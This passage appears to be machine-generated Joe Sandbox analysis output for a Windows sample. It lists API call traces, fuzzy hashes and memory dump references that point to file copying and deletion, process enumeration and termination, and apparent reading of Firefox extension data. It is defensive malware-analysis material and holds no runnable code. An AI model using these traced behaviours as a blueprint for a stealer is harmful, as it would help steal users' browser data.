                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                              • String ID:
                                              • API String ID: 211194620-0
                                              • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                              • Instruction ID: 2edf2603aa6ec1b7f3eba98c3be547499943ca847024d2397b357e616622291a
                                              • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                              • Instruction Fuzzy Hash: 2F91F2729102189BDB18FBA4DDA8DEE7339AF54208F50456DE20A62390EF747B4CCF61
                                              APIs
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02BB4BE0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                                              • lstrlenA.KERNEL32(00000000), ref: 0040D99F
                                              • lstrlenA.KERNEL32(00000000), ref: 0040D9B3
                                              • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                              • String ID:
                                              • API String ID: 211194620-0
                                              • Opcode ID: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                              • Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
                                              • Opcode Fuzzy Hash: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                              • Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A
                                              APIs
                                                • Part of subcall function 047FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 047FA9EF
                                                • Part of subcall function 047FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FAC,00420E17), ref: 047FAC2C
                                                • Part of subcall function 047FAC17: lstrcpy.KERNEL32(00000000), ref: 047FAC6B
                                                • Part of subcall function 047FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 047FAC79
                                                • Part of subcall function 047FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 047FAB6C
                                                • Part of subcall function 047F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,047E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FAC,00420E17), ref: 047F8DED
                                                • Part of subcall function 047FAB87: lstrcpy.KERNEL32(00000000,?), ref: 047FABD9
                                                • Part of subcall function 047FAB87: lstrcat.KERNEL32(00000000), ref: 047FABE9
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 047EDA68
                                              • lstrlen.KERNEL32(00000000), ref: 047EDC06
                                              • lstrlen.KERNEL32(00000000), ref: 047EDC1A
                                              • DeleteFileA.KERNEL32(00000000), ref: 047EDC99
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                              • String ID:
                                              • API String ID: 211194620-0
                                              • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                              • Instruction ID: 6a40b258347e4d256f8487ceda8beb8ad5866c8009c7f6da25735d033c2ad810
                                              • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                              • Instruction Fuzzy Hash: 1D81F3719102189BDB18FBE4DDA8DEE7339AF54208F50456DE20AA6390EF747B4CCB61
                                              APIs
                                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                                              • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                              • String ID: ^userContextId=4294967295$moz-extension+++
                                              • API String ID: 998311485-3310892237
                                              • Opcode ID: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                              • Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
                                              • Opcode Fuzzy Hash: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                              • Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA
                                              APIs
                                              • memset.MSVCRT ref: 004194EB
                                                • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                                • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                                • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                                              • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                                              • CloseHandle.KERNEL32(00000000), ref: 004195D6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                              • String ID:
                                              • API String ID: 396451647-0
                                              • Opcode ID: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                              • Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
                                              • Opcode Fuzzy Hash: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                              • Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56
                                              APIs
                                              • memset.MSVCRT ref: 047F9752
                                                • Part of subcall function 047F8FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,047F9785,00000000), ref: 047F8FC2
                                                • Part of subcall function 047F8FB7: RtlAllocateHeap.NTDLL(00000000), ref: 047F8FC9
                                                • Part of subcall function 047F8FB7: wsprintfW.USER32 ref: 047F8FDF
                                              • OpenProcess.KERNEL32(00001001,00000000,?), ref: 047F9812
                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 047F9830
                                              • CloseHandle.KERNEL32(00000000), ref: 047F983D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                              • String ID:
                                              • API String ID: 3729781310-0
                                              • Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                              • Instruction ID: 29de575c2dafad3b629707ebf96d0d8570b6133c18f36754585d34ac785d9442
                                              • Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                              • Instruction Fuzzy Hash: 923128B5E00248EFEB14DFE4CC48BEDB7B9EB44300F504459E606AA384DB746A84CF52
                                              APIs
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                                              • Process32First.KERNEL32(?,00000128), ref: 004186DE
                                              • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • CloseHandle.KERNEL32(?), ref: 00418761
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                              • String ID:
                                              • API String ID: 1066202413-0
                                              • Opcode ID: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                              • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                                              • Opcode Fuzzy Hash: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                              • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                                              APIs
                                                • Part of subcall function 047FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 047FA9EF
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 047F8931
                                              • Process32First.KERNEL32(?,00000128), ref: 047F8945
                                              • Process32Next.KERNEL32(?,00000128), ref: 047F895A
                                                • Part of subcall function 047FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FAC,00420E17), ref: 047FAC2C
                                                • Part of subcall function 047FAC17: lstrcpy.KERNEL32(00000000), ref: 047FAC6B
                                                • Part of subcall function 047FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 047FAC79
                                                • Part of subcall function 047FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 047FAB6C
                                              • CloseHandle.KERNEL32(?), ref: 047F89C8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                              • String ID:
                                              • API String ID: 1066202413-0
                                              • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                              • Instruction ID: c396ac4afb4ee529b9a8fc61ecaa36558e71f2d486478bd66afbf7e6312a8a8d
                                              • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                              • Instruction Fuzzy Hash: 1D315E71A01218ABDB24EF91DD54FEEB778EB45704F104199A20DA2390EB346A48CF91
                                              APIs
                                                • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                              • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                                              • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                                              • lstrcatA.KERNEL32(?,02BE5DD0), ref: 00414FAB
                                              • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                                                • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                              • String ID:
                                              • API String ID: 2667927680-0
                                              • Opcode ID: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                              • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                                              • Opcode Fuzzy Hash: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                              • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
                                              • wsprintfA.USER32 ref: 00418850
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocProcesslstrcpywsprintf
                                              • String ID: %dx%d
                                              • API String ID: 2716131235-2206825331
                                              • Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                              • Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
                                              • Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                              • Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcessstrtok_s
                                              • String ID:
                                              • API String ID: 3407564107-0
                                              • Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                              • Instruction ID: d4ce58c1d2602d86f429563210363c7dc8e54a7f291b804405b61ff11c5e5140
                                              • Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                              • Instruction Fuzzy Hash: FE1116B4910209EFCB04DFE5DD58AEDBBB9FF04305F508469EA0AA6350E7706B44CB55
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                                              • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                                              • wsprintfA.USER32 ref: 004179F3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocLocalProcessTimewsprintf
                                              • String ID:
                                              • API String ID: 1243822799-0
                                              • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                              • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                                              • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                              • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 047F7C17
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 047F7C1E
                                              • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 047F7C2B
                                              • wsprintfA.USER32 ref: 047F7C5A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                                              • String ID:
                                              • API String ID: 377395780-0
                                              • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                              • Instruction ID: fea7c034357bf5cb8dd1f4c4e3a8d6d4f11d155d766436d2775be1327c9ac5f0
                                              • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                              • Instruction Fuzzy Hash: 4C1139B2944118ABCB14DFCADD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB1
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 047F7CCA
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 047F7CD1
                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 047F7CE4
                                              • wsprintfA.USER32 ref: 047F7D1E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                              • String ID:
                                              • API String ID: 3317088062-0
                                              • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                              • Instruction ID: 76ffed0e801779691c598b48963226e72cdd9029307a2aeabc0836c07829db8d
                                              • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                              • Instruction Fuzzy Hash: F9115EB1A45218EFEB248F54DC49FA9B7B8FB05721F1043DAE61AA33C0D77469408F51
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: strtok_s
                                              • String ID:
                                              • API String ID: 3330995566-0
                                              • Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                              • Instruction ID: f51d08a75a7307f604e7da0607b26fb4fcc084b6c34031ccdc265df62589dcce
                                              • Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                              • Instruction Fuzzy Hash: CD11C5B4E40209EFDB14CFE6D948AAEB7B5BB04705F10C029E525A6350D778A505CF65
                                              APIs
                                              • CreateFileA.KERNEL32(047F3D55,80000000,00000003,00000000,00000003,00000080,00000000,?,047F3D55,?), ref: 047F9563
                                              • GetFileSizeEx.KERNEL32(000000FF,047F3D55), ref: 047F9580
                                              • CloseHandle.KERNEL32(000000FF), ref: 047F958E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandleSize
                                              • String ID:
                                              • API String ID: 1378416451-0
                                              • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                              • Instruction ID: 7ebb92b3290bc6c1549a03fe23f7d51614ad6b8e01e9ee81a9866f4d4ea96bf3
                                              • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                              • Instruction Fuzzy Hash: CAF019B9E40208BBDB20DFE1DC49B9A7BBAAB49710F108654AB11A72C0E635A6018B41
                                              APIs
                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 047F6D31
                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 047F6D4F
                                              • CloseHandle.KERNEL32(00000000), ref: 047F6D60
                                              • Sleep.KERNEL32(00001770), ref: 047F6D6B
                                              • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 047F6D81
                                              • ExitProcess.KERNEL32 ref: 047F6D89
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                              • String ID:
                                              • API String ID: 941982115-0
                                              • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                              • Instruction ID: ee1feb9a03ccefd217fe1744c19ba0f1ddb94ce31b8bb587ddc9b9b66aa2792f
                                              • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                              • Instruction Fuzzy Hash: 36F05878A80209BEFB10ABE0DC08BBD7675FB05745F101A18F702A5390DBB06502CA66
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
